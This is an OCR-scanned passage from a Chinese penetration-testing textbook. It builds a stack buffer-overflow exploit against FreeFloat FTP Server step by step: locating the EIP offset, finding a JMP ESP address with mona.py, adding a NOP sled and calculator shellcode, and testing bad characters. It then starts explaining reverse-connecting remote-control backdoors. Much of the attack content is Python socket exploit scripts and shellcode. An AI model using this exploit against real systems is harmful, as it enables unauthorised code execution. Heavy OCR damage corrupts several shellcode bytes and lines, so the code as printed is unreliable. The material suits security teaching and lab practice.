可 以 看 到 这 个 FreeFloat FTP Server 软件 再 次 崩溃， 如 图 6-16 所 示 。 


(x) Dont know how to continue because memory at address 37684136 is not readable. Try to change EIP or pass exception to program. 


wa 


图 6-16 目标 再 次 崩溃 
记 下 提示 信息 中 的 地 址 “37684136”， 然 后 使 用 pattern_offset 来 查找 这 个 值 对 应 的 偏 移 
， 启 动 pattern_offset 的 方法 和 之 前 的 pattern_create 几乎 是 一 样 的 ， 如 果 之 前 没有 切换 到 
et 的 目录 ， 就 需要 执行 : 
root@kali:cd /usr/share/metasploit-framework/tools/exploit 
然后 在 这 个 目录 中 执行 工具 pattern_offset.rb， 是 一 个 由 Ruby 语言 编写 的 脚本 。 
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb 


同样 可 以 使 用 参数 -h 来 查看 参数 帮助 ， 如 图 6-17 所 示 。 


/pattern_offset,rb -h 


Usage: ./ rb [opti 
Example: ./p: et.rb -q 
[*] Exact match at offset 9 


Options 
q, 
> pattern 


图 6-17 pattem_offset.rb 的 帮助 


使 用 参数 -q 加 上 溢出 的 地 址 值 ， 使 用 -1 来 指定 字符 串 的 长 度 (就 是 之 前 pattern create. 
rb 所 使 用 的 参数 ， 也 就 是 500 )， 如 图 6-18 所 示 。 


rn_offset.rb -q 


pattern_offset.rb 来 查找 溢出 的 地 址 
现在 成 功 找到 EIP 寄存 器 的 位 置 。 而 这 个 寄存 器 中 的 值 决定 了 程序 下 一 步 的 执行 位 置 ， 
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到 此 已 经 成 功 了 一 大 半 。 
现在 向 目标 发 送 能 够 导致 系统 溢出 到 EIP 的 数据 ， 之 前 已 经 计算 出 EIP 的 偏 移 量 是 230， 
那么 现在 提供 了 230 个 字符 “A” 即 可 ,之 后 就 是 4 个 “B” 


importsocket 
buff = "\x41"*230+"\x42"*4 
target = "192.168.1.106" 


s=socket.socket (socket .AF_INET,socket.SOCK_STREAM) 
s.connect((target,21)) 

s.send("USER "+buff+"\r\n") 

s.close () 


然后 仍然 重复 之 前 的 步骤， 在 虚拟 机 中 打开 FreeFloat FTP Server， 然 后 执行 上 面 的 脚 
本 ， 可 以 看 到 程序 已 经 崩溃 ， 如 图 6-19 所 示 。 显 示 崩 省 的 地 址 是 “42424242”， 这 说 明 EIP 
中 的 地 址 已 经 被 更 改 为 字符 “ .B"， 这 验证 了 之 前 找到 的 偏 移 地 址 的 正确 性 。 


Error 区 | 


@ Don't know how to continue because memory at address 42424242 is not readable. Try to change EIP or pass exception to program, 


E 


图 6-19 崩溃 的 地 址 是 “42424242” 


63 查找 JMP ESP 指令 


但 是 这 里 其 实 还 是 有 一 个 问题 ， 就 是 即使 控制 了 EP 中 的 内 容 ， 但 是 之 前 已 经 看 到 任何 
一 个 程序 在 每 一 次 执行 时 ， 操 作 系统 都 会 为 其 分 配 不 同 的 地 址 。 所 以 即使 可 以 决定 程序 下 一 
步 执 行 的 地 址 ， 但 是 却 并 不 知道 恶意 攻击 载荷 位 于 哪个 位 置 ， 还 是 没有 办 法 让 目标 服务 器 执 
行 这 个 恶意 的 攻击 载荷 。 

接 下 来 就 要 想 一 个 办 法 ， 让 这 个 EIP 中 的 地 址 指向 攻击 载荷 。 这 里 先 来 看 一 下 输入 的 用 
户 名 数据 在 执行 时 是 如 何 分 布 的 ， 如 图 6-20 所 示 。 


缓冲 区 Ea | EIP | | | ESP | 
图 6-20 程序 在 内 存 中 的 分 布 
按照 栈 的 设计 ，ESP 寄存 器 应 该 就 位 于 EIP 寄存 器 的 后 面 (中 间 可 能 有 一 些 空隙 )。 那 么 
这 个 寄存 器 就 是 最 理想 的 选择 ， 一 来 在 使 用 大 量 字 符 来 溢出 栈 的 时 候 ， 也 可 以 使 用 特定 字符 
来 覆盖 ESP， 二 来 虽然 无 法 对 ESP 寄存 器 进行 定位 ， 但 是 可 以 利用 一 条 “JMP ESP” 的 跳 转 
指令 来 实现 跳 转 到 当前 ESP 寄存 器 ， 如 图 6-21 所 示 。 
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缓冲 区 EBpl| EP | Es |<—| 原本 程序 在 内 存 中 的 分 布 ”| 
SEPAREN | PPE] posa [raras] <— [ 涪 我 们 构造 数据 修改 后 的 内 存 分 | 


图 6-21 接收 数据 之 后 程序 的 内 存 分 布 

接 下 来 的 工作 就 是 要 找到 一 条 地 址 不 会 发 生 改 变 的 “JMP ESP” 指 令 。ntdll.dll (NT 
Layer DLL) 是 Windows NT 操作 系统 的 重要 模块 ， 属 于 系统 级 别 的 文件 ， 用 于 堆栈 释放 、 进 
程 管理 。kernel32.dll 是 Windows 9x/Me 中 非常 重要 的 32 位 动态 链接 库 文 件 ， 属 于 内 核 级 文 
件 。 它 控制 着 系统 的 内 存 管理 、 数 据 的 输入 输出 操作 和 中 断 处 理 ， 当 Windows 启动 时 ，ker- 
nel32.dll 就 驻 留 在 内 存 中 特定 的 写 保 护 区 域 ， 使 别 的 程序 无 法 占用 这 个 内 存 区 域 

一 些 经 常 被 用 到 的 动态 链接 库 会 被 映射 到 内 存 ， 如 kermel.32.dll 、user32.dll 会 被 几乎 所 
有 进程 加 载 ， 且 加 载 基 址 始终 相同 (不同 操作 系统 上 可 能 不 同 )。 现 在 只 需要 在 这 些 动 态 链接 
库 中 找到 “JMP ESP” 命 令 就 可 以 了 。 找到 的 “JMP ESP ”的 地 址 是 一 直 都 不 会 变 的 

这 里 还 需要 使 用 到 Immunity Debugger， 但 是 这 个 工具 本 身 并 没有 提 su ei “JMP ESP” 
命令 的 功能 ， 需 要 借助 一 个 使 用 Python 编写 的 插件 来 完成 这 个 任务 ， 这 个 插件 就 是 Mona. 
py， 可 以 从 https://github.com/corelan/mona FRÈ 

Mona.py 的 使 用 方法 也 很 简单 ， 只 需要 将 下 载 好 的 这 个 插件 复制 到 Immunity Debugger 
交 装 目录 下 的 PyCommands 文件 夹 中 就 可 以 使 用 了 。 然 后 在 Immunity Debugger 的 命令 行 中 
输入 “!mona” 命 令 ， 如 图 6-22 所 示 


A Immunity Debugger - FTPSeryer.exe - [CPU - thread 00000EEC, module ntal] AEEA] 
[C] Ele Yew Debug plugins Immub Options window Help Jobs 


-x 
— 3 TU) qx p HJSL H 2 HJ 1 nl 


k 


图 6-22 在 Immunity Debugger 中 启动 mona 


如 果 mona py 插件 已 经 成 功 被 加 载 了， 执行 这 条 命令 就 会 打开 一 个 Log data 窗口 ， 其 中 


第 6 章 ”漏洞 渗透 模块 的 编写 


给 出 了 mona.py 的 介绍 和 使 用 方法 ， 如 图 6-23 所 示 。 


eeRoFee0 


图 6-23 mona.py 的 工作 界面 


在 命令 行 中 执行 “!mona jmp -r esp” 来 查找 “JMP ESP” 命 令 ， 执 行 的 


所 示 


ft 
MAMMAM MMA 


IGE, 
IGE, 
IGE, 
IGE, 
GE, 


mm 
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图 6-24 使 
可 以 看 到 这 里 找到 了 很 多 条 
GDI32.dll, ADVAPI32.dll, jx Œ m 


“7C9D30D7”。 


] mona.py 查找 到 的 “JMPESP” 命 令 


可 以 使 用 的 指令 ， 这 些 指 
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ER 如 图 6-24 


要 来 源 于 SHELL32.dll， 
选择 第 一 条 指令 来 作为 跳 转 指令 ， 需 要 记录 下 地 址 
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64 ”编写 渗透 程序 


这 里 的 地 址 存在 一 个 问题 ， 同 样 的 一 个 地 址 数据 在 网 络 传输 和 CPU 存储 时 的 表示 方法 
是 不 同 的 ， 其 中 包括 大 端 和 小 端的 概念 。 大 端 ( Big-Endian)、 小 端 ( Little-Endian) 以 及 网 络 
字 节 序 的 概念 在 编程 中 经 常会 遇 到 ， 其 中 ， 网 络 字 节 序 (Network Byte Order) 一 般 是 指 大 端 
(Big-Endian， 对 大 部 分 网 络 传输 协议 而 言 ) 传输 。 大 端 、 小 端的 概念 是 面向 多 字 节 数据 类 型 
的 存储 方式 定义 的 。 小 端 就 是 低位 在 前 (低位 字 节 存在 内 存 低地 址 ， 字 节 高 低 顺序 和 内 存 高 
低地 址 顺序 相同 ) ; 大 端 就 是 高 位 在 前 (其中,“ 前 ”是 指 靠近 内 存 低 地 址 ， 存 储 在 硬盘 上 就 
是 先 写 那 个 字 节 )。 概 念 上 字 节 序 也 叫 主机 序 
这 里 其 实 就 是 在 使 用 Python 编程 向 目标 发 送 “ JMP ESP” 指 令 的 地 址 时 使 用 的 是 大 端 
格式 ， 而 当前 的 地 址 “7C9D30D7” 其 实 是 小 端 k 式 ， 两 者 需要 进行 调整 。 如 果 和 希望 使 用 
“7C9D30D7” 来 覆盖 目标 地 址 ， 在 使 用 Python 编写 渗透 程序 的 时 候 就 需要 使 用 倒置 的 地 址 
“/xD7/x30/x9D/x7C” 
现在 向 目标 发 送 能 够 导致 系统 溢出 到 EIP 的 数据 ， 之 前 已 经 计算 出 EIP 的 偏 移 量 
那么 现在 提供 了 230 个 字符 “A” 即 可 ,之 后 就 是 “\xD7\x30\x9D\x7C” 


import socket 

buff = "\x41"*230+"\xD7\x30\x9D\x7C" 

target = "192.168.1.106" 
s=socket.socket (socket .AF_INET, socket .SOCK_ STREAM) 
s.connect ( (target,21) ) 

s.send("USER "+buff+"\r\n") 

s.close () 


然后 仍然 重复 之 前 的 步骤， 在 虚拟 机 中 打开 FreeFloat FTP Server， 然 后 执行 上 面 的 脚 
本 ， 如 图 6-25 所 示 


图 6-25 ”找到 溢出 的 地 址 
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是 不 是 看 起 来 胜利 就 在 眼前 ?按照 之 前 的 设计 ， 现 在 只 需要 把 希望 在 目标 计算 机 上 执行 
的 代码 添加 进去 即 可 。 接 下 来 编写 一 段 可 以 在 目标 计算 机 上 启动 的 计算 器 程序 。 


"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1i" 
”\xle\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
"\x3a\x32\xlc\xbf\x62\xed\xld\x54\xd5\x66\x29\x21\xe7\x96" 
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\xlb\x05\x6b" 
"\xf0\x27\xdd\x48\xfd\x22\x38\xlb\xa2\xe8\xc3\xf7\x3b\x7a" 
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
"AZ1fAx57VxS3Vz64Vz51 VxalNz33VxcdVxf5Nxzc6Nzf5Nxc1NzTJTeNx98"% 
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 
"\x7f\xe8\x7b\xca"; 


这 段 脚 本 如 果 在 目标 计算 机 上 执行 ， 就 会 启动 计算 器 程序 。 下 面 将 这 段 脚本 添加 到 原来 
程序 的 bu 华中 ， 修 改 之 后 的 程序 就 变 成 如 下 。 


importsocket 

buff = "\x41"*230+"\xD7\x30\x9D\x7C" 
shellcode="\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" 
shellcode+="\xle\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 
shellcode+="\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
shellcode+="\x3a\x32\xlc\xbf\x62\xed\xld\x54\xd5\x66\x29\x21\xe7\x96" 
shellcode+="\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" 
shellcode+="\xf0\x27\xdd\x48\xfd\x22\x38\xlb\xa2\xe8\xc3\xf7\x3b\x7a" 
shellcode+="\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
shellcode+="\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 
shellcode+="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
shellcode+="\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 
shellcode+="\x7f\xe8\x7b\xca" 

buff+=shellcode 

target = "192.168.1.106" 

s=socket . socket (socket .AF_INET, socket .SOCK_STREAM) 
s.connect ( (target, 21)) 

s.send ("USER "+buff+"\r\n") 

s.close() 


执行 这 段 脚本 之 后 ， 目 标 系统 的 FreeFloat FTP Server HT, 但 是 却 没有 启动 计算 器 程 
序 ， 这 是 为 什么 呢 ? 还 是 启动 Immunity Debugger 来 调试 一 下 ， 可 以 看 到 这 里 之 前 的 命令 都 
执行 成 功 了 ,但 是 ESP 的 地 址 向 后 发 生 了 偏 移 ， 这 样 就 导致 了 Shellcode 的 代码 并 没有 全 
部 载 入 到 ESP 中 ， 最 前 面 的 一 部 分 在 ESP 的 外 面 ， 这 样 就 会 导致 即使 控制 了 程序 ， 但 是 由 
于 ESP 中 只 有 一 部 分 Shellcode， 因 此 执行 的 时 候 缺 失 了 一 部 分 ， 从 而 导致 程序 不 能 够 正常 
执行 。 

那么 该 如 何 解决 这 个 问题 呢 ? 解决 的 方法 就 是 一 个 特殊 的 指令 “ \x90”。.“\x90” 其 实 就 
是 NOPS， 也 就 是 空 指令 ， 这 个 指令 不 会 执行 任何 的 实际 操作 。 但 是 它 也 是 一 条 指令 ， 因 此 
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会 顺序 地 向 下 执行 ， 这 样 即使 并 不 知道 ESP 的 真实 地 址 ， 只 需要 多 在 EIP 后 面 添加 一 些 空 指 
令 ， 只 要 这 些 空 指令 够 多 ， 已 经 将 Shellcode 偏 移 进 了 ESP， 就 可 以 顺利 执行 Shellcode。 
例如 ， 现 在 向 程序 中 添加 20 个 “\x90”， 修 改 的 代码 如 下 所 示 。 


import Socket 

buff = "\x41"*230+"\xD7\x30\x9D\x7C"+"\x90"*20 
shellcode="\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" 
shellcode+="\xle\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" 
shellcode+="\x718\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" 
shellcode+="\x3a\x32\xlc\xbf\x62\xed\xld\x54\xd5\x66\x29\x21\xe7\x96" 
shellcode \x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\xlb\x05\x6b" 
shellcode+="\xf0\x27\xdd\x48\xfd\x22\x38\xlb\xa2\xe8\xc3\xf7\x3b\x7a" 
shellcode+="\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" 
shellcode+="\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" 
shellcode+="\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" 
shellcode+="\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" 
shellcode+="\x7f\xe8\x7b\xca" 

buff+=shellcode 

target = "192.168.1.106" 

s=socket.socket (socket.AF_INET, socket .SOCK_STREAM) 
s.connect ( (target, 21)) 

s.send ("USER "+buff+"\r\n") 

s.close() 


现在 执行 一 下 这 段 脚本 ， 查 看 目标 系统 的 反应 ， 可 以 看 到 当 右 侧 的 程序 执行 之 后 ， 目 标 
系统 就 会 弹出 一 个 计算 器 程序 ， 如 图 6-26 所 示 。 这 说 明 编 写 的 漏洞 渗透 程序 已 经 成 功 。 


ede hell Daug Onan 


Python 2 
winda 


t AF_INET, socket. 30CK_STREAN) 
s.conneet | (target, Z1) ) 
了 sendtnTSER "butti" cio") 


图 6-26 ”执行 脚本 时 弹出 计算 器 程序 (该 测试 中 目标 就 是 本 机 ) 


65 坏 字 符 的 确定 


虽然 上 面 的 漏洞 渗透 程序 编写 得 很 成 功 ， 但 是 在 实际 中 却 未 必 如 此 顺利 。 即 使 所 有 需要 
的 量 都 计算 得 很 准确 ， 后 来 加 入 的 Shellcode 却 未 必 能 执行 成 功 。 要 注意 上 面 实例 中 输入 的 
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230 个 A,“ JMP ESP” 的 指令 地 址 以 及 要 执行 的 Shellcode 的 内 容 都 是 以 FTP 的 用 户 名 的 形 
式 输入 的 ， 也 就 是 说 ， 其 实 上 面 的 所 有 内 容 都 是 FTP 的 用 户 名 。 但 是 FTP 对 用 户 名 是 有 限 
制 的 ， 并 非 所 有 的 字符 都 可 以 出 现在 用 户 名 中 。 如 果 内 容 中 包含 这 种 不 被 允许 的 字符 ， 就 可 
能 导致 FTP 服务 器 拒绝 接收 后 面 的 内 容 ， 从 而 导致 代码 只 传送 了 一 部 分 。 但 是 每 个 程序 ， 甚 
至 每 个 程序 的 人 口 接收 的 规则 都 不 一 样 ， 很 难 直 接 指出 哪些 是 坏 字符 ， 但 是 可 以 使 用 逐个 测 
试 的 方法 找 出 这 些 字符 。 下 面 列 出 了 所 有 可 能 的 字符 。 


"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\ 
X13\x14\x15\x16\x17\x18\x19\xla\xlb\xlc\xld\xle\xlf" 
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\ 
X33\xX34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" 
"\xX40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\ 
X53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 
"\X60\x61\xX62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\ 
X73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\ 
X93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 
"\xa0\xal\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xbl\xb2\ 
xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 
"\xc0\xcl\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\ 
xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 
"\xe0\xel\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\ 
Xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 


以 前 常用 的 方法 是 将 这 些 字符 一 个 一 个 进行 尝试 ， 然 后 找 出 其 中 的 坏 字符 。 这 种 方法 效 
率 十 分 低下 ， 可 以 使 用 一 些 工具 (例如 mona.py) 来 完成 这 个 任务 。 但 是 出 于 学 习 的 目的 ， 通 
过 这 种 逐个 尝试 的 方法 可 以 更 容易 地 掌握 模块 编写 的 原理 。 首 先 回 头 看 一 下 之 前 编写 的 那个 
用 来 连接 服务 器 的 程序 。 

import socket 

offset_to_eip = 230 

buffer = "A" * offset_to_eip 

buffer += "BBBB" 

buffer += "A" *50 

s = socket.socket (socket.AF_INET, socket .SOCK_STREAM) 

connect = s.connect (('192.168.1.106',21)) 

response = s.recv(1024) 

s.send('USER ' + buffer + '\r\n') 

启动 Immunity Debugger， 接 下 来 将 这 个 FreeFloat FTP Server 的 进程 附加 到 Immunity 
Debugger 中 。 
当 运 行 这 个 程序 的 时 候 ，FreeFloat FTP Server 程序 会 崩溃 ， 在 Immunity Debugger 中 查 


， 可 以 看 到 如 图 6-27 所 示 的 结果 ， 用 鼠标 找到 42424242 ae 
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图 6-27 找到 用 户 名 的 输入 位 置 


好 了 ， + 论 过 这 个 问题 ,“ BBBB ”现在 所 在 的 位 置 就 是 EIP 指针 的 位 置 ， 
它 后 面 的 位 置 就 是 要 放置 坏 字符 的 位 置 。 接 下 来 修改 上 面 的 那 段 程序 , 在 “BBBB” 的 后 面 
深 加 所 有 的 字符 ， 修 改 后 的 程序 如 下 所 示 


#!/usr/bin/python 

import socket 

badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\ 
Xx10\x11\x12\x13\x14\x15\x16\x17\x18\x19\xla\x1b\xlc\xld\xle\x1f" 

"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\ 
x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 

"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\ 
Xx54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 

"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\ 
X713\x74\x75\xX76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 

"\xX80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\ 
X93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 

"\xa0\xal\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\ 
xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 

"\xc0\xcl\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\ 
xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 

"\xe0\xel\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\ 
xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 

offset_to_eip = 230 

buffer = "A" * offset_to_eip 

buffer += "BBBB" 

buffer += badchars * 

s = socket.socket (socket.AF INET,socket.SOCK STREAM) 

connect = s.connect(('192.168.1.106',21)) 

response = s.recv (1024) 

s.send('USER ' + buffer + '\r\n') 


这 段 程序 将 会 把 所 有 的 字符 都 发 送 到 目标 服务 器 中 ,但 是 坏 字符 串 会 引起 程序 的 终止 ， 
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仍然 执行 这 段 程序 ， 并 在 Inmunity Debugger 中 查看 ， 如 图 6-28 所 示 。 


SEE 
图 6-28 引起 程序 终止 的 位 置 
在 这 里 可 以 看 到 在 “BBBB ”后 面 的 第 一 行 的 后 面 出 现 了 “了 Password required”， 这 说 明 
在 “BBBB” 后 面 的 第 一 行 里 出 现 了 导致 目标 软件 认为 用 户 名 已 经 输入 结束 的 字符 了 。 回 头 
看 一 下 这 一 行 ， 一 共 是 4 个 字符 “\x00x01\x02\x03"”， 首 先 将 这 里 面 的 “\x00” 去 掉 ， 如 果 
程序 继续 向 下 执行 ， 那 么 说 明 这 个 字符 是 坏 字符 ， 还 是 这 个 程序 ， 修 改 之 后 变 为 : 


"\xO01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\xO0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\ 
x14\x15\x16\x17\x18\x19\xla\xlb\xlc\xld\xle\xlf" 


执行 这 个 程序 ， 查 看 一 下 结果 ， 如 图 6-29 所 示 


止 的 位 置 
， 在 第 三 行 用 户 名 的 输入 再 次 被 终止 了 ， 那 
么 这 说 明 现 在 的 “\x01\x02\x03Wx04\x05Wx06\Wx07\x08Wx09” 已 经 没有 问题 了 ， 出 问题 的 一 定 是 
“x0ax0b\x0cx0d” 中 的 一 个 。 再 将 这 4 个 字符 一 个 一 个 地 去 掉 后 看 一 下 。 首 先 去 掉 “\x0a”， 
然后 执行 这 个 程序 ， 使 用 Immunity Debugger 查看 里 面 的 变化 ， 如 图 6-30 所 示 


图 6-30 第 三 次 
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我 们 很 幸运 ， 这 里 面 的 坏 字符 刚好 是 “\x0a"， 所 以 一 次 就 尝试 出 来 了 。 如 果 坏 字符 是 
“\x0d”， 要 尝试 的 次 数 显然 要 更 多 。 剩 下 的 步骤 读者 最 好 自行 完成 ， 这 个 程序 中 的 坏 字 符 是 
“Wx00”“\x0a”“\x40”， 那 么 在 编写 Shellcode 的 时 候 ， 就 需要 避免 这 三 个 坏 字符 。 


6.6 ”使 用 Metasploit 来 生成 Shellcode 


发 现 目标 的 漏洞 之 后 ， 就 可 以 去 查找 对 应 的 漏洞 渗透 模块 。 单 单 是 别人 编写 好 的 漏洞 渗 
透 模块 并 不 能 实现 预计 的 功能 。 上 例 中 利用 该 漏洞 渗透 模块 39009.py 实现 了 对 目标 的 渗透， 
成 功 崩 溃 了 目标 系统 上 运行 的 Easy File Sharing， 并 启动 了 计算 器 程序 ， 但 是 如 果 需 要 在 目标 
上 执行 其 他 功能 呢 ? 

之 前 曾经 将 漏洞 渗透 模块 比喻 成 一 个 进入 目标 系统 的 钥匙 ， 现 在 已 经 获得 了 这 把 珍贵 的 
钥匙 ， 接 下 来 可 以 将 一 段 代码 (也 就 是 之 前 提 到 的 Shellcode) 送 到 目标 系统 并 执行 。 如 果 可 
以 选择 ， 你 会 希望 这 段 代码 实现 哪个 功能 ? 

(1) 让 目标 系统 上 的 服务 崩溃 。 

(2) 在 目标 系统 上 执行 某 个 程序 。 

(3) 直接 控制 目标 系统 。 

是 不 是 第 三 个 选择 是 最 激动 人 心 的 呢 ? 那么 希望 在 目标 系统 上 运行 的 代码 就 应 该 是 一 个 
远程 控制 程序 。 远 程控 制程 序 是 一 个 很 常见 的 计算 机 用 语 ， 指 的 就 是 可 以 在 一 台 设 备 上 操纵 
另 一 台 设备 的 软件 。 

通常 情况 下 ， 远 程控 制程 序 一 般 分 成 两 个 部 分 : 被 控 端 和 主 控 端 。 如 果 一 台 计 算 机 上 执 
行 了 这 个 被 控 端 ， 就 会 被 男 外 一 台 装 有 主 控 端 的 计算 机 所 控制 了 。 曾 经 掀起 禾 轰 烈 烈 全 民 黑 
客运 动 的 “ 灰 钥 子 ” 就 是 这 样 一 个 远程 控制 软件 ， 据 统计 早 在 2005 年 的 时 候 ,“ 灰 鸽子 ”就 
已 经 感染 了 近 百 万 台 计算 机 。 

现在 世界 上 被 广泛 使 用 的 远程 控制 软件 有 很 多 种 ， 其 中 既 有 一 些 确实 是 为 人 们 提供 工作 
便利 的 正常 软件 ， 例 如 TeamViewer， 也 有 一 些 是 专门 为 黑客 人 侵 所 打造 的 后 门 木 马 。 

在 这 里 并 不 去 考虑 这 些 软件 的 目的 是 善意 还 是 恶意 ， 而 是 从 技术 的 角度 对 其 进行 分 类 。 
实际 上 ， 远 程控 制 软件 的 分 类 标准 有 很 多 ， 这 里 只 介绍 两 个 最 为 常用 的 标准 。 

第 一 个 标准 就 是 远程 控制 软件 被 控 端 与 主 控 端 的 连接 方式 。 按 照 不 同 的 连接 方式 ， 可 以 
将 远程 控制 软件 分 为 正 向 和 反 向 两 种 。 

这 里 假设 这 样 一 个 场景 ， 一 个 黑客 设法 在 受害 者 的 计算 机 上 执行 了 远程 控制 软件 服务 
m, 那么 把 黑客 现在 所 使 用 的 计算 机 称 为 Hacker， 而 把 受害 者 所 使 用 的 计算 机 称 为 A。 如 果 
说 黑客 所 使 用 的 远程 控制 软件 是 正 向 的 ， 那么 计算 机 A 在 执行 了 这 个 远程 控制 服务 端 之 后 ， 
只 会 在 自己 的 主机 上 打开 一 个 端口 ， 然 后 等 待 Hacker 计算 机 的 连接 ,注意 此 时 A 计算 机 并 
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不 会 去 主动 通知 Hacker 计算 机 (而 反 向 控制 软件 会 )， 因 此 黑客 必须 知道 计算 机 A 的 他 地 
址 。 这 导致 了 正 向 控制 在 实际 操作 中 具有 很 大 的 困难 。 

而 反 向 远程 控制 则 截然 不 同 ， 当 计算 机 A 在 执行 了 这 个 远程 控制 被 控 端 之 后 ， 会 主动 去 
通知 Hacker 计算 机 ,“ 嗨 ， 我 现在 受 你 的 控制 了 ,请 下 命令 吧 ”， 因 此 黑客 也 无 须知 道 计算 机 
A 的 四 地 址 ， 只 需要 把 这 个 远程 控制 被 控 端 发 送 给 目标 即 可 。 现 在 黑客 所 使 用 的 远程 控制 软 
件 大 都 采用 了 反 向 控制 。 

另外 一 种 常见 的 分 类 方法 就 是 按照 目标 操作 系统 的 不 同 而 分 类 ， 这 就 很 容易 理解 了 , F 
时 在 Windows 上 运行 的 软件 大 都 是 exe 文件 ， 而 Android 操作 系统 上 则 大 都 是 apk 文件 。 显 
然 你 制造 的 一 个 Windows 平台 下 使 用 的 远程 控制 被 控 端 对 于 手机 使 用 的 Android 操作 系统 是 
毫 无 作用 的 。 目 前 常见 的 操作 系统 主要 有 微软 的 Windows， 谷 歌 的 Android， 苹 果 的 ioOS 以 
及 各 种 Linux 系统 。 

另外 ， 随 着 互联 网 不 断 发 展 ， 针 对 各 种 网 站 开发 技术 的 远程 控制 软件 也 出 现 了 ， 这 些 远 
程控 制 软件 也 都 采用 和 网 站 开发 相同 的 语言 ， 例 如 ASP、PHP 等 。 

讲 到 远程 控制 软件 中 的 被 控 端 和 主 控 端 ， 它 们 必须 成 对 使 用 ， 被 控 端 就 是 要 运行 在 被 目 
